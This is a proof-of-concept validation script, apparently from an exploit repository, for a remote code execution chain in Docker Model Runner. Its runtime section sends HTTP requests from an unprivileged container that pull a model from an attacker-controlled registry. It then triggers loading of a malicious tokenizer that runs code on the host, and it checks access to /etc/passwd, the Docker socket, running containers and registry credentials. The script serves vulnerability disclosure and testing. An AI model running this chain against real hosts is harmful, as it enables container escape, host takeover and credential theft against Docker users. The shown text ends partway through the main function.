5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / test_claims.py PY
#!/usr/bin/env python3
#
# Claim validation for the Docker Model Runner RCE.
#
# Static tests read the source. They show the bug exists in the codebase but
# don't show it can actually be triggered. Runtime tests do the latter.
#
# Usage:
#   python3 test_claims.py                  # all tests
#   python3 test_claims.py --json           # machine output
#   python3 test_claims.py --runtime-only   # skip static
#   python3 test_claims.py --static-only    # skip runtime
#
# Env:
#   REPO_ROOT      path to the model-runner repo (default: ../ from this file)
#   REGISTRY_HOST  registry host for HTTP probes (default: localhost)
#   REGISTRY_PORT  registry port (default: 5555)
#   PROOF_FILE     where the payload writes proof (default: /tmp/poc_rce_proof)

import hashlib
import json
import os
import re
import subprocess
import sys
import time
import urllib.request
import urllib.error
from pathlib import Path

REPO_ROOT = Path(os.environ.get("REPO_ROOT", Path(__file__).resolve().parent.parent))
REGISTRY_HOST = os.environ.get("REGISTRY_HOST", "localhost")
REGISTRY_PORT = int(os.environ.get("REGISTRY_PORT", "5555"))
PROOF_FILE = os.environ.get("PROOF_FILE", "/tmp/poc_rce_proof")

# Model Runner is on the host so it reaches the registry via localhost
# (port-mapped from the registry container).
PULL_MODEL_NAME = f"localhost:{REGISTRY_PORT}/evil/rce-model:latest"
MODEL_RUNNER_URL = "http://model-runner.docker.internal"

GREEN = "\033[92m"
RED = "\033[91m"
YELLOW = "\033[93m"
CYAN = "\033[96m"
BOLD = "\033[1m"
RESET = "\033[0m"

if not sys.stdout.isatty() or "--json" in sys.argv:
    GREEN = RED = YELLOW = CYAN = BOLD = RESET = ""

results = []


def log_result(claim_id, description, passed, detail="", proves=""):
    status_str = {True: f"{GREEN}PASS{RESET}", False: f"{RED}FAIL{RESET}",
                  None: f"{YELLOW}SKIP{RESET}"}[passed]
    results.append({
        "id": claim_id, "desc": description, "passed": passed,
        "detail": detail, "proves": proves,
    })
    print(f"  [{status_str}] {claim_id}: {description}")
    if detail and "--json" not in sys.argv:
        for line in detail.strip().split("\n"):
            print(f"         {line}")


def read_file(path):
    full = REPO_ROOT / path
    if not full.exists():
        return None
    return full.read_text()


def grep_file(path, pattern):
    content = read_file(path)
    if content is None:
        return []
    return [(i, line.strip()) for i, line in enumerate(content.split("\n"), 1)
            if re.search(pattern, line)]


def http_get(url, timeout=5):
    try:
        resp = urllib.request.urlopen(urllib.request.Request(url), timeout=timeout)
        return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()
    except Exception as e:
        return None, str(e)


def docker_run(args, timeout=30):
    # minimal container - truly unprivileged
    cmd = ["docker", "run", "--rm", "--no-healthcheck",
           "--security-opt=no-new-privileges",
           "curlimages/curl:latest"] + args
    try:
        r = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return r.returncode, r.stdout, r.stderr
    except subprocess.TimeoutExpired:
        return -1, "", "timeout"
    except FileNotFoundError:
        return -1, "", "docker not found"


# Claim 1 - blob digest verification is absent (static)
def test_claim_1():
    print(f"\n{BOLD}{CYAN}Claim 1: blob digest verification is absent{RESET}")

    blobs_go = read_file("pkg/distribution/internal/store/blobs.go")
    if blobs_go is None:
        log_result("1a", "blobs.go not found", False,
                   f"Expected at {REPO_ROOT}/pkg/distribution/internal/store/blobs.go")
        return

    lines = blobs_go.split("\n")

    # 1a - find io.Copy in WriteBlobWithResume, confirm no hash after it
    in_func = False
    io_copy_line = None
    rename_line = None
    for i, line in enumerate(lines, 1):
        if "func" in line and "WriteBlobWithResume" in line:
            in_func = True
        if in_func:
            if "io.Copy(f, r)" in line and io_copy_line is None:
                io_copy_line = i
            if io_copy_line and "os.Rename" in line and rename_line is None:
                rename_line = i

    hash_between = False
    if io_copy_line and rename_line:
        for i in range(io_copy_line, rename_line):
            if "SHA256" in lines[i - 1] or "sha256" in lines[i - 1].lower():
                if "oci.SHA256" in lines[i - 1]:
                    hash_between = True

    log_result("1a",
        "WriteBlobWithResume: io.Copy at line {}, os.Rename at line {}, no hash between".format(
            io_copy_line, rename_line),
        io_copy_line is not None and rename_line is not None and not hash_between,
        f"Lines {io_copy_line}-{rename_line}: raw copy then immediate rename, no verification.",
        proves="Download path writes bytes to disk and renames to final path with "
               "no digest check anywhere in between.")

    # 1b - SHA256 exists but only in the resume path (before io.Copy)
    hash_go = read_file("pkg/distribution/oci/hash.go")
    sha256_exists = hash_go is not None and "func SHA256(" in hash_go
    sha256_calls = grep_file("pkg/distribution/internal/store/blobs.go", r"oci\.SHA256\(")
    all_before_copy = all(ln < (io_copy_line or 0) for ln, _ in sha256_calls)

    log_result("1b",
        "SHA256 exists but only called in the resume path (before io.Copy)",
        sha256_exists and len(sha256_calls) > 0 and all_before_copy,
        f"oci.SHA256 calls at lines: {[ln for ln, _ in sha256_calls]}. "
        f"io.Copy at line {io_copy_line}. All calls precede the download.",
        proves="The hash function exists but is never applied to a fresh download. "
               "It's only used to decide whether an .incomplete file is already done.")

    # 1c - nothing after io.Copy verifies the content before rename
    post_copy_checks = []
    if io_copy_line and rename_line:
        check_words = ["digest", "hash", "verify", "compare", "SHA256", "sha256", "checksum"]
        for i in range(io_copy_line + 1, rename_line):
            line = lines[i - 1]
            if any(w in line for w in check_words) and not line.strip().startswith("//"):
                post_copy_checks.append((i, line.strip()))

    log_result("1c",
        "No verification code between io.Copy and os.Rename",
        len(post_copy_checks) == 0,
        f"Checked lines {io_copy_line+1}-{rename_line-1}: "
        f"{'no verification found' if not post_copy_checks else post_copy_checks}",
        proves="A malicious registry can serve any bytes for a given declared digest "
               "and Model Runner stores them without complaint.")


# Claim 2 - registry serves model, Model Runner accepts it (runtime)
def test_claim_2():
    print(f"\n{BOLD}{CYAN}Claim 2: malicious registry accepted by Model Runner{RESET}")

    # 2a - PoC registry is up and internally consistent
    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/selftest")
    if status is None or status != 200:
        log_result("2a", "Registry self-test", None,
                   f"Registry not reachable at {REGISTRY_HOST}:{REGISTRY_PORT}: {body}")
        log_result("2b", "Model Runner accepts pull", None, "Registry not running")
        log_result("2c", "Pulled model appears in model list", None, "Registry not running")
        return

    selftest = json.loads(body)
    log_result("2a", "Registry self-test passes (digests consistent, valid OCI)",
               selftest["passed"],
               f"Blob count: {selftest['blob_count']}, errors: {selftest['errors']}",
               proves="The PoC serves valid OCI content. All digests match, this isn't "
                      "a malformed artifact.")

    # 2b - pull the model via Model Runner from inside a container
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf -X POST {MODEL_RUNNER_URL}/api/pull '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"name": "{PULL_MODEL_NAME}"}}\' 2>&1'
    ], timeout=60)

    if rc == -1 and "docker not found" in stderr:
        log_result("2b", "Pull model via Model Runner", None, "docker not available")
        log_result("2c", "Pulled model in model list", None, "docker not available")
        return

    if "Could not resolve host" in stdout or "Connection refused" in stdout:
        log_result("2b", "Pull model via Model Runner", None,
                   f"Model Runner not reachable: {stdout[:200]}")
        log_result("2c", "Pulled model in model list", None, "Model Runner not reachable")
        return

    pull_ok = rc == 0 and "error" not in stdout.lower()
    log_result("2b", "Model Runner pulls from a malicious registry without complaint",
               pull_ok,
               f"Exit code: {rc}\nResponse: {stdout[:300]}",
               proves="Model Runner accepted a model from an attacker-controlled registry. "
                      "Pull completed, no digest verification failure.")

    # 2c - verify the model appears in the list
    rc2, stdout2, stderr2 = docker_run([
        "sh", "-c",
        f'curl -sf {MODEL_RUNNER_URL}/api/tags 2>&1'
    ], timeout=15)

    model_listed = PULL_MODEL_NAME.replace(":latest", "") in stdout2 or "evil" in stdout2.lower()
    log_result("2c", "Pulled model appears in Model Runner's model list",
               model_listed if rc2 == 0 else None,
               f"Model list response: {stdout2[:300]}",
               proves="Malicious model is stored and available for inference.")


# Claim 3 - Python backends enable trust_remote_code (static + runtime)
def test_claim_3():
    print(f"\n{BOLD}{CYAN}Claim 3: Python backends enable trust_remote_code{RESET}")

    # 3a - Go side doesn't pass --no-trust-remote-code anywhere
    backend_files = [
        ("vllm", "pkg/inference/backends/vllm/vllm.go"),
        ("vllm-metal", "pkg/inference/backends/vllm/vllm_metal.go"),
        ("vllm-config", "pkg/inference/backends/vllm/vllm_config.go"),
        ("mlx", "pkg/inference/backends/mlx/mlx.go"),
        ("sglang", "pkg/inference/backends/sglang/sglang.go"),
    ]
    trust_flag_found = {}
    for name, path in backend_files:
        content = read_file(path)
        if content:
            if "trust-remote-code" in content or "trust_remote_code" in content:
                matches = grep_file(path, r"trust.remote.code")
                trust_flag_found[name] = matches

    log_result("3a",
        "No backend passes --no-trust-remote-code or --trust-remote-code",
        len(trust_flag_found) == 0,
        f"Searched {len(backend_files)} backend files. "
        f"Flag references: {trust_flag_found if trust_flag_found else 'none'}",
        proves="The Go launcher never disables vLLM's default trust_remote_code behavior. "
               "vLLM imports code referenced by auto_map in tokenizer_config.json. "
               "(The actual trust_remote_code=True default lives in the upstream vLLM "
               "package, not this repo. This test only confirms the Go side doesn't "
               "override it.)")

    # 3b - vllm-metal passes --model pointing at an unverified directory
    vllm_metal = read_file("pkg/inference/backends/vllm/vllm_metal.go")
    passes_model_path = vllm_metal is not None and '"--model"' in vllm_metal

    log_result("3b",
        "vllm-metal passes --model <path> where path is the unverified blob store",
        passes_model_path,
        "vllm_metal.go passes --model pointing to the bundle directory. The contents\n"
        "come from the blob store, which has no integrity checks (claim 1).\n"
        "AutoTokenizer.from_pretrained() with trust_remote_code=True then imports any\n"
        ".py referenced by auto_map in tokenizer_config.json.",
        proves="The path given to vLLM points at attacker-controlled content. With "
               "claim 3a, that means arbitrary Python import from the model dir.")


# Claim 4 - Python backends run without sandboxing (static)
def test_claim_4():
    print(f"\n{BOLD}{CYAN}Claim 4: Python backends run without sandboxing{RESET}")

    python_backends = {
        "vllm": "pkg/inference/backends/vllm/vllm.go",
        "vllm-metal": "pkg/inference/backends/vllm/vllm_metal.go",
        "mlx": "pkg/inference/backends/mlx/mlx.go",
        "sglang": "pkg/inference/backends/sglang/sglang.go",
        "diffusers": "pkg/inference/backends/diffusers/diffusers.go",
    }

    unsandboxed = []
    sandboxed = []
    for name, path in python_backends.items():
        matches = grep_file(path, r'SandboxConfig:\s*""')
        if matches:
            unsandboxed.append(f"{name} (line {matches[0][0]})")
        else:
            sandboxed.append(name)

    log_result("4a",
        f"All {len(python_backends)} Python backends have SandboxConfig=\"\"",
        len(unsandboxed) == len(python_backends),
        f"Unsandboxed: {unsandboxed}\nSandboxed: {sandboxed if sandboxed else 'none'}",
        proves="No OS-level sandbox on any Python backend. Code imported via "
               "trust_remote_code runs with the full privileges of the Model Runner "
               "process (the Docker Desktop user).")

    # 4b - contrast: llama.cpp IS sandboxed
    llamacpp = grep_file("pkg/inference/backends/llamacpp/llamacpp.go",
                         r"SandboxConfig.*sandbox\.Configuration")
    log_result("4b",
        "llama.cpp (C++ backend) actually configures a sandbox",
        len(llamacpp) > 0,
        f"llama.cpp: {llamacpp}",
        proves="The codebase knows how to sandbox backends. Python ones being unsandboxed "
               "is a choice (or at least a gap), not a missing framework.")


# Claim 5 - internal API has no auth (static + runtime)
def test_claim_5():
    print(f"\n{BOLD}{CYAN}Claim 5: internal API reachable without auth{RESET}")

    # 5a - model-runner.docker.internal is the configured endpoint
    launch_go = read_file("cmd/cli/commands/launch.go")
    has_endpoint = launch_go is not None and "model-runner.docker.internal" in launch_go

    log_result("5a-code",
        "model-runner.docker.internal endpoint configured in launch.go",
        has_endpoint,
        proves="Docker Desktop exposes Model Runner to every container at this address.")

    # 5b - no auth middleware on API handlers
    handler_files = [
        "pkg/ollama/http_handler.go",
        "pkg/inference/scheduling/http_handler.go",
        "pkg/inference/models/http_handler.go",
    ]
    auth_evidence = []
    for path in handler_files:
        content = read_file(path)
        if not content:
            continue
        for pattern in ["authMiddleware", "requireAuth", "checkAuth",
                        "apiKey", "api_key", "Authorization"]:
            matches = grep_file(path, pattern)
            for ln, line in matches:
                # exclude: BearerToken (used for upstream registry auth), comments, tests
                if ("BearerToken" not in line and "bearer" not in line.lower()
                        and not line.strip().startswith("//")):
                    auth_evidence.append(f"{path}:{ln}: {line}")

    log_result("5b",
        "No authentication middleware on API handlers",
        len(auth_evidence) == 0,
        f"Searched {len(handler_files)} handler files.\n"
        f"Auth enforcement: {auth_evidence if auth_evidence else 'none'}",
        proves="/api/pull and /engines/v1/chat/completions take requests from any "
               "container with no credentials.")

    # 5c - CORS only blocks requests WITH a disallowed Origin
    cors_go = read_file("pkg/middleware/cors.go")
    if cors_go:
        has_origin_check = 'r.Header.Get("Origin")' in cors_go
        # key line: `if origin != "" && !allowed` - empty origin is never blocked
        allows_empty_origin = 'origin != "" && !allowed' in cors_go or \
                              'origin != ""' in cors_go

        log_result("5c",
            "CORS only blocks if Origin is set and not allowed (empty Origin passes)",
            has_origin_check and allows_empty_origin,
            'cors.go line 29: `if origin != "" && !allowed` -> 403.\n'
            "Requests with no Origin (all container curl requests) are never blocked.\n"
            "CORS is a browser-only thing.",
            proves="The only access control (CORS) does nothing for container-to-API "
                   "requests. No defense against non-browser clients.")

    # 5d - runtime: reach Model Runner from an unprivileged container
    rc, stdout, stderr = docker_run([
        "-s", "-o", "/dev/null", "-w", "%{http_code}",
        f"{MODEL_RUNNER_URL}/api/tags"
    ], timeout=15)

    if rc == -1 and "docker not found" in stderr:
        log_result("5d-runtime", "Container can reach Model Runner API", None,
                   "docker not available")
        return

    status_code = stdout.strip()
    if status_code in ("000", ""):
        log_result("5d-runtime", "Container can reach Model Runner API", None,
                   f"Model Runner not reachable (HTTP {status_code}). "
                   "Is Docker Desktop Model Runner enabled?")
    else:
        log_result("5d-runtime",
            f"Unprivileged container reaches Model Runner API (HTTP {status_code})",
            status_code == "200",
            f"Container ran with --no-healthcheck --security-opt=no-new-privileges.\n"
            f"No Docker socket mount, no --privileged, no caps.",
            proves="Unprivileged container with default config reaches the API.")


# Claim 6 - RCE on host as Docker Desktop user (runtime)
def test_claim_6():
    print(f"\n{BOLD}{CYAN}Claim 6: code executes on host as Docker Desktop user{RESET}")

    proof_path = Path(PROOF_FILE)
    if not proof_path.exists():
        log_result("6a", "Host-level code execution", None,
                   f"Proof file {PROOF_FILE} missing.\n"
                   "Run the full attack first (./run_poc.sh full)")
        log_result("6b", "Host filesystem access", None, "Proof file missing")
        log_result("6c", "Runs as Docker Desktop user", None, "Proof file missing")
        return

    try:
        proof = json.loads(proof_path.read_text())
    except (json.JSONDecodeError, OSError) as e:
        log_result("6a", "Host-level code execution", None,
                   f"Proof file exists but is unreadable: {e}")
        return

    # 6a - code executed
    log_result("6a", "Arbitrary code executed on host",
               proof.get("rce") is True,
               f"Hostname: {proof.get('hostname')}\n"
               f"User: {proof.get('user')}\n"
               f"PID: {proof.get('pid')}",
               proves="evil_tokenizer.py ran and wrote proof to the HOST filesystem "
                      "(not inside a container).")

    # 6b - host filesystem access
    log_result("6b", "Process has host filesystem access",
               proof.get("can_read_etc_passwd") is True,
               f"Can read /etc/passwd: {proof.get('can_read_etc_passwd')}\n"
               f"Can write /tmp: {proof.get('can_write_tmp')}\n"
               f"Working dir: {proof.get('cwd')}\n"
               f"Model dir: {proof.get('model_dir')}",
               proves="Process can read sensitive host files (/etc/passwd) and write "
                      "to host directories (/tmp). Not sandboxed.")

    # 6c - Docker Desktop user (not root, not container user)
    uid_str = proof.get("uid", "")
    user = proof.get("user", "")
    is_host_user = user != "" and user != "root" and "uid=0" not in uid_str

    log_result("6c", f"Runs as host user '{user}' (not root, not container user)",
               is_host_user,
               f"uid line: {uid_str}\n"
               f"HOME: {proof.get('env_HOME')}",
               proves="Code runs as the Docker Desktop user with their full privileges, "
                      "file access, network.")

    # Container escape proof - host RCE can control the Docker daemon, which
    # gives full container escape: unpriv container -> host RCE -> daemon -> any container.

    # 6d - Docker socket accessible from host
    socket_exists = proof.get("docker_socket_exists")
    socket_writable = proof.get("docker_socket_writable")

    if socket_exists is None:
        log_result("6d", "Docker socket accessible from host-side payload", None,
                   "Proof file missing docker_socket fields (older payload)")
    else:
        log_result("6d", "Docker socket accessible from host-side payload",
                   socket_exists is True,
                   f"Socket exists: {socket_exists}\n"
                   f"Socket writable: {socket_writable}",
                   proves="Host-side payload can hit the Docker socket. Attacker controls "
                          "the daemon from code that started life in an unprivileged container.")

    # 6e - can enumerate every running container
    docker_ps = proof.get("docker_ps")
    ps_count = proof.get("docker_ps_count", 0)

    if docker_ps is None:
        log_result("6e", "Host-side payload can enumerate all containers", None,
                   "docker ps not available or failed")
    else:
        log_result("6e", f"Host-side payload sees {ps_count} running container(s) via docker ps",
                   ps_count > 0,
                   f"docker ps output:\n{docker_ps}",
                   proves="From host-side RCE, attacker sees every container. With socket "
                          "write access they can exec into, stop, or create more.")

    # 6f - Docker daemon version accessible
    docker_ver = proof.get("docker_version")

    if docker_ver is None:
        log_result("6f", "Host-side payload can query Docker daemon", None,
                   "docker version not available or failed")
    else:
        log_result("6f", f"Host-side payload talks to Docker daemon (v{docker_ver})",
                   len(docker_ver) > 0,
                   f"Docker version: {docker_ver}",
                   proves="Payload talks to the Docker daemon API. Equivalent to having "
                          "the socket mounted: create privileged containers, mount the "
                          "host filesystem, pivot elsewhere.")

    # 6g - Docker credentials readable
    config_exists = proof.get("docker_config_exists")
    has_auths = proof.get("docker_config_has_auths")
    registries = proof.get("docker_config_registries", [])

    if config_exists is None:
        log_result("6g", "Docker registry credentials accessible from host", None,
                   "docker_config fields missing from proof")
    elif not config_exists:
        log_result("6g", "Docker registry credentials file not present", None,
                   "~/.docker/config.json doesn't exist (no registries logged in)")
    else:
        log_result("6g",
            f"Docker config accessible ({len(registries)} registries)",
            config_exists is True,
            f"~/.docker/config.json exists: {config_exists}\n"
            f"Has auth entries: {has_auths}\n"
            f"Registries: {registries}\n"
            "NOTE: actual credentials are NOT exfiltrated, only proving access.",
            proves="Attacker can read Docker registry creds from the host. Supply chain "
                   "attacks: push malicious images to any registry the user is logged into.")


# Claim 7 - malicious content persists (static)
def test_claim_7():
    print(f"\n{BOLD}{CYAN}Claim 7: malicious content persists in blob store{RESET}")

    store_go = read_file("pkg/distribution/internal/store/store.go")

    # 7a - no integrity check during store init/open
    init_verifies = False
    if store_go:
        lines = store_go.split("\n")
        in_init = False
        for i, line in enumerate(lines, 1):
            if re.match(r'func.*\b(New|Open|Init|Load)\b', line):
                in_init = True
            if in_init:
                if any(w in line for w in ["SHA256", "verify", "integrity", "checksum"]):
                    if not line.strip().startswith("//"):
                        init_verifies = True
                        break
                if line.startswith("}"):
                    in_init = False

    log_result("7a", "No integrity check when the blob store is opened",
               not init_verifies,
               f"Checked every New/Open/Init/Load in store.go.\n"
               f"Integrity check found: {init_verifies}",
               proves="Once stored, a blob is never re-verified. A malicious model "
                      "survives Docker Desktop restarts.")

    # 7b - hasBlob early-returns for existing blobs
    has_blob = grep_file("pkg/distribution/internal/store/blobs.go", r"hasBlob\(")
    early_return = grep_file("pkg/distribution/internal/store/blobs.go",
                              r"if hasBlob\b")

    log_result("7b", "Existing blobs skip re-download (hasBlob early return)",
               len(has_blob) > 0 and len(early_return) > 0,
               f"hasBlob calls: {len(has_blob)}, early returns: {len(early_return)}",
               proves="Re-pulling the same model skips download if blobs exist. Tampered "
                      "content never gets refreshed or re-verified.")


# Edge cases
def test_edge_cases():
    print(f"\n{BOLD}{CYAN}Edge cases{RESET}")

    # E1 - resume path only checks completeness, not fresh downloads
    sha256_calls = grep_file("pkg/distribution/internal/store/blobs.go",
                              r"oci\.SHA256\(existingFile\)")
    compare_calls = grep_file("pkg/distribution/internal/store/blobs.go",
                               r"computedHash.*==.*diffID")

    log_result("E1",
        "Resume-path SHA256 only checks if an .incomplete file is already complete",
        len(sha256_calls) > 0 and len(compare_calls) > 0,
        "The SHA256 check runs only when an .incomplete file is sitting around from\n"
        "a previous interrupted download. It checks whether the file is already complete\n"
        "(hash matches diffID). It does not run on fresh downloads.",
        proves="The presence of SHA256 in the resume path isn't digest verification of "
               "downloaded content.")

    # E2 - manifest not crypto-verified after fetch
    # ComputeDigest() exists but isn't called during pull.
    manifest_verify_calls = []
    for path in ["pkg/distribution/oci/remote/remote.go",
                 "pkg/distribution/internal/store/store.go",
                 "pkg/distribution/distribution/client.go"]:
        matches = grep_file(path, r"(\.ComputeDigest\(\)|verifyManifest|manifest.*SHA256)")
        manifest_verify_calls.extend([(path, ln, line) for ln, line in matches
                                      if not line.strip().startswith("//")])

    compute_digest_def = grep_file("pkg/distribution/oci/manifest.go", r"func.*ComputeDigest")

    log_result("E2",
        "Manifest content not cryptographically verified after fetch",
        len(manifest_verify_calls) == 0,
        f"ComputeDigest() defined: {bool(compute_digest_def)}, "
        f"called during pull: {bool(manifest_verify_calls)}\n"
        f"Call sites found: {manifest_verify_calls if manifest_verify_calls else 'none'}",
        proves="Trust comes entirely from TLS. A compromised registry or MITM with a "
               "valid TLS cert can serve arbitrary manifests.")

    # E3 - path traversal protections exist (showing what IS protected)
    path_checks = grep_file("pkg/distribution/internal/bundle/unpack.go",
                             r"(validatePathWithinDirectory|filepath\.IsLocal)")
    log_result("E3",
        "Bundle unpacking has path traversal protections",
        len(path_checks) > 0,
        f"Safety checks found: {len(path_checks)} locations",
        proves="Path traversal via layer annotations is blocked. The attack vector here "
               "is code execution via trust_remote_code, not path traversal.")

    # E4 - CORS is the only access control
    cors_go = read_file("pkg/middleware/cors.go")
    if cors_go:
        origin_only = 'r.Header.Get("Origin")' in cors_go
        log_result("E4",
            "CORS (Origin check) is the only access control",
            origin_only,
            proves="No IP filtering, no auth tokens, no mTLS. Containers bypass CORS by "
                   "just not sending an Origin header.")


# Full attack chain (runtime)
def test_full_chain():
    print(f"\n{BOLD}{CYAN}Full attack chain{RESET}")

    try:
        r = subprocess.run(["docker", "info"], capture_output=True, timeout=10)
        if r.returncode != 0:
            print(f"  {YELLOW}SKIP{RESET}: docker not running")
            return
    except (FileNotFoundError, subprocess.TimeoutExpired):
        print(f"  {YELLOW}SKIP{RESET}: docker not available")
        return

    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/selftest")
    if status is None or status != 200:
        print(f"  {YELLOW}SKIP{RESET}: registry not running at {REGISTRY_HOST}:{REGISTRY_PORT}")
        return

    rc, stdout, stderr = docker_run([
        "-s", "-o", "/dev/null", "-w", "%{http_code}",
        f"{MODEL_RUNNER_URL}/api/tags"
    ], timeout=15)
    mr_status = stdout.strip()
    if mr_status != "200":
        print(f"  {YELLOW}SKIP{RESET}: Model Runner not reachable (HTTP {mr_status})")
        print(f"         Make sure Docker Desktop Model Runner is enabled.")

        try:
            r = subprocess.run(["docker", "model", "list"], capture_output=True, timeout=10)
            if r.returncode != 0:
                print(f"         'docker model list' failed: {r.stderr[:200]}")
                print(f"         Your Docker Desktop may not support Model Runner.")
        except FileNotFoundError:
            print(f"         'docker model' command not found.")
        return

    print(f"\n  Checking available Python backend...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf {MODEL_RUNNER_URL}/engines 2>&1 || echo ENGINES_FAIL'
    ], timeout=15)
    print(f"    Available engines: {stdout[:200]}")

    for f in [PROOF_FILE, f"{PROOF_FILE}.flag"]:
        try:
            os.remove(f)
        except FileNotFoundError:
            pass

    print(f"\n  Step 1: pulling model from malicious registry...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf -X POST {MODEL_RUNNER_URL}/api/pull '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"name": "{PULL_MODEL_NAME}"}}\' 2>&1'
    ], timeout=90)
    print(f"    Response: {stdout[:300]}")

    if "error" in stdout.lower() and rc != 0:
        log_result("CHAIN-1", "Pull from malicious registry", False,
                   f"Pull failed: {stdout[:300]}")
        return

    log_result("CHAIN-1", "Model pulled from malicious registry",
               "error" not in stdout.lower(),
               f"Response: {stdout[:200]}",
               proves="Model Runner accepted the malicious model from the attacker registry.")

    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/requests")
    if status == 200:
        reqs = json.loads(body)
        blob_reqs = [r for r in reqs if "/blobs/" in r["path"]]
        manifest_reqs = [r for r in reqs if "/manifests/" in r["path"]]
        print(f"    Registry saw: {len(manifest_reqs)} manifest + {len(blob_reqs)} blob requests")

    print(f"\n  Step 2: triggering inference (this loads the model + evil tokenizer)...")
    print(f"    Might take 30-120s if the Python backend has to start...")
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sf --max-time 120 -X POST '
        f'{MODEL_RUNNER_URL}/engines/v1/chat/completions '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"model": "{PULL_MODEL_NAME}", '
        f'"messages": [{{"role": "user", "content": "hello"}}]}}\' 2>&1'
    ], timeout=150)
    print(f"    Response: {stdout[:300]}")

    # Inference may fail (model is too small, OOM, etc.) but the tokenizer
    # import happens at LOAD time, before inference starts. Check the proof.
    log_result("CHAIN-2", "Inference request sent (import happens during model load)",
               rc != -1,
               f"Response: {stdout[:200]}\n"
               "NOTE: inference failure is expected with this tiny model. The import-time "
               "code execution happens before inference runs.",
               proves="Model loading was triggered. evil_tokenizer.py gets imported "
                      "during AutoTokenizer.from_pretrained().")

    print(f"\n  Step 3: checking for RCE proof on host...")
    # The backend might still be coming up
    for attempt in range(6):
        if Path(PROOF_FILE).exists() or Path(f"{PROOF_FILE}.flag").exists():
            break
        if attempt < 5:
            time.sleep(2)

    proof_path = Path(PROOF_FILE)
    if proof_path.exists():
        try:
            proof = json.loads(proof_path.read_text())
            log_result("CHAIN-3", "RCE CONFIRMED, arbitrary code executed on host",
                       proof.get("rce") is True,
                       json.dumps(proof, indent=2),
                       proves="A container with no special privileges got arbitrary "
                              "code execution on the Docker host via two HTTP requests.")
        except json.JSONDecodeError:
            content = proof_path.read_text()
            log_result("CHAIN-3", "RCE CONFIRMED, proof file written on host",
                       len(content) > 0,
                       f"Content: {content[:500]}",
                       proves="Code executed on the host and wrote to the host filesystem.")
    elif Path(f"{PROOF_FILE}.flag").exists():
        log_result("CHAIN-3", "RCE CONFIRMED, flag file written on host", True,
                   f"Flag: {Path(f'{PROOF_FILE}.flag').read_text()}",
                   proves="Code executed on the host.")
    else:
        log_result("CHAIN-3", "RCE proof file not found on host", False,
                   f"Expected at: {PROOF_FILE}\n"
                   "Possible reasons:\n"
                   "  1. No Python backend (vllm-metal/vllm/mlx/sglang) installed\n"
                   "  2. Model loading failed before the tokenizer import\n"
                   "  3. Selected backend was llama.cpp (C++, doesn't import .py)\n"
                   "  4. Proof file path is different on this system")


# Summary
def print_summary():
    print(f"\n{'='*72}")
    print(f"{BOLD}CLAIMS MATRIX{RESET}")
    print(f"{'='*72}")

    static_tests = [r for r in results if not r["id"].startswith(("CHAIN", "2", "5d", "6"))]
    runtime_tests = [r for r in results if r["id"].startswith(("CHAIN", "2", "5d", "6"))]

    print(f"\n{BOLD}Static analysis (from source code):{RESET}")
    for r in static_tests:
        status = {True: f"{GREEN}PROVEN{RESET}", False: f"{RED}DISPROVEN{RESET}",
                  None: f"{YELLOW}UNTESTED{RESET}"}[r["passed"]]
        print(f"  {r['id']:12s} [{status}] {r['desc']}")
        if r.get("proves") and r["passed"] is True:
            print(f"               -> {r['proves'][:100]}")

    print(f"\n{BOLD}Runtime (live exploitation):{RESET}")
    for r in runtime_tests:
        status = {True: f"{GREEN}PROVEN{RESET}", False: f"{RED}DISPROVEN{RESET}",
                  None: f"{YELLOW}UNTESTED{RESET}"}[r["passed"]]
        print(f"  {r['id']:12s} [{status}] {r['desc']}")
        if r.get("proves") and r["passed"] is True:
            print(f"               -> {r['proves'][:100]}")

    passed = sum(1 for r in results if r["passed"] is True)
    failed = sum(1 for r in results if r["passed"] is False)
    skipped = sum(1 for r in results if r["passed"] is None)

    print(f"\n{'='*72}")
    print(f"{BOLD}TOTALS{RESET}")
    print(f"  {GREEN}Proven: {passed}{RESET}  |  "
          f"{RED}Disproven: {failed}{RESET}  |  "
          f"{YELLOW}Untested: {skipped}{RESET}  |  "
          f"Total: {len(results)}")

    static_passed = all(r["passed"] is True for r in static_tests if r["passed"] is not None)
    runtime_passed = all(r["passed"] is True for r in runtime_tests if r["passed"] is not None)
    any_runtime_tested = any(r["passed"] is not None for r in runtime_tests)

    print()
    if static_passed:
        print(f"  {GREEN}Source: all claims validated{RESET}")
        print(f"    Bug exists in the codebase as described.")
    else:
        print(f"  {RED}Source: some claims failed{RESET}")
        for r in static_tests:
            if r["passed"] is False:
                print(f"    FAILED: {r['id']}: {r['desc']}")

    if any_runtime_tested:
        if runtime_passed:
            print(f"  {GREEN}Runtime: all claims validated{RESET}")
            print(f"    Attack chain works end-to-end.")
        else:
            runtime_fails = [r for r in runtime_tests if r["passed"] is False]
            runtime_ok = [r for r in runtime_tests if r["passed"] is True]
            if runtime_fails:
                print(f"  {RED}Runtime: some claims failed{RESET}")
                for r in runtime_fails:
                    print(f"    FAILED: {r['id']}: {r['desc']}")
            if runtime_ok:
                print(f"  {GREEN}Runtime: {len(runtime_ok)} claims validated{RESET}")
    else:
        print(f"  {YELLOW}Runtime: not tested{RESET}")
        print(f"    Needs: Docker Desktop with Model Runner + a Python backend")

    if "--json" in sys.argv:
        print("\n--- JSON ---")
        print(json.dumps({
            "results": results,
            "summary": {
                "passed": passed, "failed": failed, "skipped": skipped,
                "static_validated": static_passed,
                "runtime_validated": runtime_passed if any_runtime_tested else None,
            }
        }, indent=2))

    return failed == 0


def main():
    if not (REPO_ROOT / "pkg").exists():
        print(f"ERROR: REPO_ROOT={REPO_ROOT} doesn't contain pkg/")
        print(f"Set REPO_ROOT env var to the model-runner repo root.")
        sys.exit(2)

    print(f"{BOLD}{'='*72}")
    print(f"Docker Model Runner vulnerability claim validation")
